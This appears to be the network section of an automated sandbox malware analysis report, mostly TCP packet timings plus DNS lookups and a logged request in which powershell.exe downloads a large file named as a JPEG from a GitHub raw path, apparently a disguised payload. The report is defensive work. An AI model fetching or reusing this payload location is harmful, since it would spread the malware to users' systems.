                                                                              Dec 31, 2024 00:46:00.750577927 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.750595093 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.750627995 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.750633955 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.750662088 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.750850916 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.750861883 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.750917912 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.750926018 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.795974016 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.795991898 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.796041965 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.796051979 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.796081066 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.837821960 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.837838888 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.837920904 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.837929964 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838078976 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838105917 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838145971 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.838156939 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838187933 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.838459969 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838471889 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838536024 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.838545084 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838677883 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838696003 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838731050 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.838737965 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838772058 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.838934898 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.838968992 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.839004993 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.839013100 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.839027882 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.839374065 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.839390039 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.839438915 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.839445114 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.839471102 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.839483976 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.839495897 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.839545012 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.839551926 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.879205942 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.884325981 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.884344101 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.884407997 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.884416103 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.884459019 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.926392078 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.926407099 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.926470995 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.926480055 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.926523924 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.926702023 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.926719904 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.926753998 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.926759958 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.926791906 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.926889896 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.926907063 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.926920891 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.926953077 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.926959038 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.926986933 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.927009106 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.927242041 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.927254915 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.927299976 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.927306890 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.927351952 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.927515984 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.927531004 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.927578926 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.927592039 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.927649975 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.927798033 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.927814007 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.927850008 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.927855968 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.927886963 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.927905083 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.928106070 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.928122997 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.928173065 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.928180933 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.928258896 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.973345995 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.973366976 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.973422050 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.973429918 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:00.973464012 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:00.973474026 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.015152931 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015176058 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015255928 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.015263081 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015278101 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015299082 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015321016 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.015326977 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015346050 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.015394926 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.015522003 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015535116 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015589952 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.015595913 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015645981 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.015842915 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015856981 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015907049 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.015913010 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.015958071 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.016190052 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.016206980 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.016256094 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.016262054 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.016295910 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.016351938 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.016367912 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.016424894 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.016432047 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.016470909 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.016591072 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.016604900 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.016663074 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.016675949 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.016721964 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.061630964 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.061675072 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.061758041 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.061764002 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.061827898 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.103712082 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.103728056 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.103820086 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.103828907 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.103883028 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.103885889 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.103895903 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.103920937 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.103954077 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.103960037 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.103972912 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.104005098 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.104156017 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.104171991 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.104226112 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.104233027 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.104285002 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.104406118 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.104420900 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.104479074 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.104486942 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.104551077 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.104804039 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.104819059 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.104866028 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.104871988 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.104902029 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.104923010 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.105017900 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.105031967 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.105083942 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.105091095 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.105139971 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.150022984 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.150069952 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.150118113 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.150125027 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.150180101 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.150204897 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.192061901 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192086935 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192159891 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.192167044 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192214966 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.192245007 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192261934 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192315102 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.192322016 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192373037 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.192640066 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192656040 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192707062 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.192713022 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192751884 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.192784071 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192817926 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192850113 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.192857027 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.192886114 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.193078041 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.193108082 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.193137884 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.193144083 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.193171978 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.193275928 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.193289042 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.193336010 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.193341970 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.193371058 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.193747044 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.193758011 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.193809032 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.193814993 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.193836927 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.193942070 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.193953991 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.194010019 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.194024086 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.238579988 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.238898993 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.238914013 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.238980055 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.238987923 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.239031076 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.280914068 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.280929089 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281016111 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.281023026 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281068087 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.281174898 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281189919 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281243086 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.281250000 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281290054 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.281491041 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281507015 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281542063 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.281548023 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281578064 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.281588078 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.281744957 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281759977 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281805038 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.281811953 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.281852007 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.282072067 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.282088041 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.282135963 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.282141924 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.282180071 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.282259941 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.282275915 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.282313108 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.282319069 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.282351971 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.282351971 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.282608032 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.282630920 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.282665014 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.282671928 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.282697916 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.282711029 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.327491045 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.327506065 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.327617884 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.327626944 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.327677011 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.369688034 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.369704008 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.369807005 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.369815111 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.369821072 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.369838953 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.369887114 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.369895935 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.369942904 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.370542049 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.370604992 CET44349704185.199.111.133192.168.2.5
                                                                              Dec 31, 2024 00:46:01.370654106 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:01.373966932 CET49704443192.168.2.5185.199.111.133
                                                                              Dec 31, 2024 00:46:05.828139067 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:05.828166008 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:05.828234911 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:05.828622103 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:05.828632116 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.461292028 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.461374998 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:06.465792894 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:06.465810061 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.466023922 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.467886925 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:06.515338898 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.873380899 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.873409033 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.873425961 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.873472929 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:06.873497963 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.873522043 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:06.873549938 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:06.965650082 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.965709925 CET44349705185.166.143.48192.168.2.5
                                                                              Dec 31, 2024 00:46:06.965750933 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:06.965795040 CET49705443192.168.2.5185.166.143.48
                                                                              Dec 31, 2024 00:46:06.973500013 CET49705443192.168.2.5185.166.143.48

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 31, 2024 00:45:57.323589087 CET5381353192.168.2.51.1.1.1
                                                                              Dec 31, 2024 00:45:57.330703020 CET53538131.1.1.1192.168.2.5
                                                                              Dec 31, 2024 00:46:05.820818901 CET6214953192.168.2.51.1.1.1
                                                                              Dec 31, 2024 00:46:05.827577114 CET53621491.1.1.1192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 31, 2024 00:45:57.323589087 CET192.168.2.51.1.1.10xcaddStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                              Dec 31, 2024 00:46:05.820818901 CET192.168.2.51.1.1.10xf422Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 31, 2024 00:45:57.330703020 CET1.1.1.1192.168.2.50xcaddNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                              Dec 31, 2024 00:45:57.330703020 CET1.1.1.1192.168.2.50xcaddNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                              Dec 31, 2024 00:45:57.330703020 CET1.1.1.1192.168.2.50xcaddNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                              Dec 31, 2024 00:45:57.330703020 CET1.1.1.1192.168.2.50xcaddNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                              Dec 31, 2024 00:46:05.827577114 CET1.1.1.1192.168.2.50xf422No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                              Dec 31, 2024 00:46:05.827577114 CET1.1.1.1192.168.2.50xf422No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                              Dec 31, 2024 00:46:05.827577114 CET1.1.1.1192.168.2.50xf422No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • raw.githubusercontent.com
                                                                              • bitbucket.org

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549704185.199.111.1334437660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-30 23:45:57 UTC121OUTGET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1
                                                                              Host: raw.githubusercontent.com
                                                                              Connection: Keep-Alive
                                                                              2024-12-30 23:45:57 UTC888INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 4697658
                                                                              Cache-Control: max-age=300
                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                              Content-Type: image/jpeg
